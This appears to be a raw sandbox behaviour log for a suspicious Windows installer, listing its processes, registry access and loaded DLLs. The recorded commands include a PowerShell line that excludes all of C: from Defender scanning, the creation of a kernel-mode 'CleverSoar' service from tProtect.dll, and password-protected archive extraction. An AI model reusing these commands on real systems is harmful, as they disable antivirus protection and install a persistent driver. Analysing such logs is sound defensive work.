Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:1780:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:2080:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6548:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:6096:120:WilError_03
Source: C:\Windows\System32\conhost.exeMutant created: \BaseNamedObjects\Local\SM0:3452:120:WilError_03
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpFile read: C:\Users\user\Desktop\desktop.ini
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpKey value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion RegisteredOrganization
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeVirustotal: Detection: 6%
Source: #U5b89#U88c5#U52a9#U624b1.0.2.exeString found in binary or memory: /LOADINF="filename"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeFile read: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe
Source: unknownProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Program Files (x86)\Windows NT\7zr.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmpProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknownProcess created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\sc.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: unknown | Process created: C:\Windows\System32\cmd.exe cmd /c start sc start CleverSoar
Source: C:\Windows\System32\conhost.exe | Process created: C:\Windows\System32\Conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$1043E,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe"
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" -Command "Add-MpPreference -ExclusionPath 'C:\'"
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe "C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Process created: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp "C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp" /SL5="$100214,5031707,845824,C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe" /VERYSILENT
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y res.dat -pad8dtyw9eyfd9aslyd9iald
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Program Files (x86)\Windows NT\7zr.exe 7zr.exe x -y locale3.dat -pasfasdf79yf9layslofs
Source: C:\Users\user\AppData\Local\Temp\is-C3OKH.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc create CleverSoar displayname= CleverSoar binPath= "C:\Program Files (x86)\Windows NT\tProtect.dll" type= kernel start= auto
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\sc.exe sc start CleverSoar
Source: C:\Windows\System32\cmd.exe | Process created: unknown unknown
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\#U5b89#U88c5#U52a9#U624b1.0.2.exe | Section loaded: apphelp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: mpr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: version.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winhttp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: uxtheme.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: kernel.appcore.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wtsapi32.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: winsta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: textinputframework.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coreuicomponents.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntmarta.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: coremessaging.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wintypes.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: shfolder.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: rstrtmgr.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ncrypt.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: ntasn1.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.storage.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: wldp.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: propsys.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: edputil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: urlmon.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: iertutil.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: srvcli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: netutils.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: windows.staterepositoryps.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sspicli.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: appresolver.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: bcp47langs.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: slc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: userenv.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: sppc.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: onecorecommonproxystub.dll
Source: C:\Users\user\AppData\Local\Temp\is-NN3J3.tmp\#U5b89#U88c5#U52a9#U624b1.0.2.tmp | Section loaded: onecoreuapcommonproxystub.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: windows.storage.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wldp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msasn1.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: gpapi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: msisip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wshext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: appxsip.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: opcservices.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: secur32.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: propsys.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: wininet.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: microsoft.management.infrastructure.native.unmanaged.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mi.dll
